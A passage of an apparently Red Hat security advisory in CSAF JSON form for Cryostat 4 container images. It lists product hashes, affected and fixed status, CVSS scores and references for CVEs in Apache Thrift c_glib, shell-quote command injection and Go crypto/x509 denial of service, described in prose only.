"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2463410"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Apache Thrift c_glib language bindings. A remote attacker could send specially crafted requests to a c_glib-based Thrift server, leading to a mismatched memory management routines vulnerability. This could cause the server to crash with a \"free(): invalid pointer\" error, resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Apache Thrift: c_glib: Apache Thrift c_glib: Denial of Service via specially crafted requests",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
],
"known_not_affected": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-48431"
},
{
"category": "external",
"summary": "RHBZ#2463410",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2463410"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-48431",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48431"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-48431",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48431"
},
{
"category": "external",
"summary": "http://www.openwall.com/lists/oss-security/2026/04/28/8",
"url": "http://www.openwall.com/lists/oss-security/2026/04/28/8"
},
{
"category": "external",
"summary": "https://lists.apache.org/thread/lb4j0zyd5f3g36cos0wql925przpnwql",
"url": "https://lists.apache.org/thread/lb4j0zyd5f3g36cos0wql925przpnwql"
}
],
"release_date": "2026-04-28T09:11:44.283000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-22T17:15:26+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:28010"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Apache Thrift: c_glib: Apache Thrift c_glib: Denial of Service via specially crafted requests"
},
{
"cve": "CVE-2026-9277",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"discovery_date": "2026-05-22T14:01:14.427751+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2480741"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the shell-quote component. The quote() function did not properly validate object-token inputs, allowing line terminators to pass unescaped into the output. A remote attacker could exploit this vulnerability by providing specially crafted input, which a POSIX shell would interpret as a command separator. This could lead to command injection, enabling the attacker to execute arbitrary code on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "shell-quote: shell-quote: Arbitrary code execution via command injection due to unescaped line terminators",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64"
],
"known_not_affected": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-9277"
},
{
"category": "external",
"summary": "RHBZ#2480741",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480741"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-9277",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-9277"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-9277",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9277"
},
{
"category": "external",
"summary": "https://github.com/ljharb/shell-quote",
"url": "https://github.com/ljharb/shell-quote"
},
{
"category": "external",
"summary": "https://github.com/ljharb/shell-quote/commit/1518179",
"url": "https://github.com/ljharb/shell-quote/commit/1518179"
},
{
"category": "external",
"summary": "https://github.com/ljharb/shell-quote/security/advisories/GHSA-w7jw-789q-3m8p",
"url": "https://github.com/ljharb/shell-quote/security/advisories/GHSA-w7jw-789q-3m8p"
},
{
"category": "external",
"summary": "https://www.npmjs.com/package/shell-quote",
"url": "https://www.npmjs.com/package/shell-quote"
}
],
"release_date": "2026-05-22T13:22:38.873000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-22T17:15:26+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:28010"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "shell-quote: shell-quote: Arbitrary code execution via command injection due to unescaped line terminators"
},
{
"cve": "CVE-2026-32281",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2026-04-08T02:01:00.930989+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2456333"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Go\u0027s `crypto/x509` package. A remote attacker could exploit this by presenting a specially crafted certificate chain containing a large number of policy mappings. This inefficient validation process consumes excessive resources, which can lead to a denial of service (DoS) for applications or systems performing certificate validation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: golang: Go crypto/x509: Denial of Service via inefficient certificate chain validation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw occurs during the validation of otherwise trusted certificate chains that contain a large number of policy mappings, leading to excessive resource consumption. Exploitation requires an attacker to present a specially crafted, yet trusted, certificate chain which would require the attacker has already compromised a trusted certificate root. Red Hat continuously monitors certificate authorities and curates the set which is trusted by default for Red Hat products.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
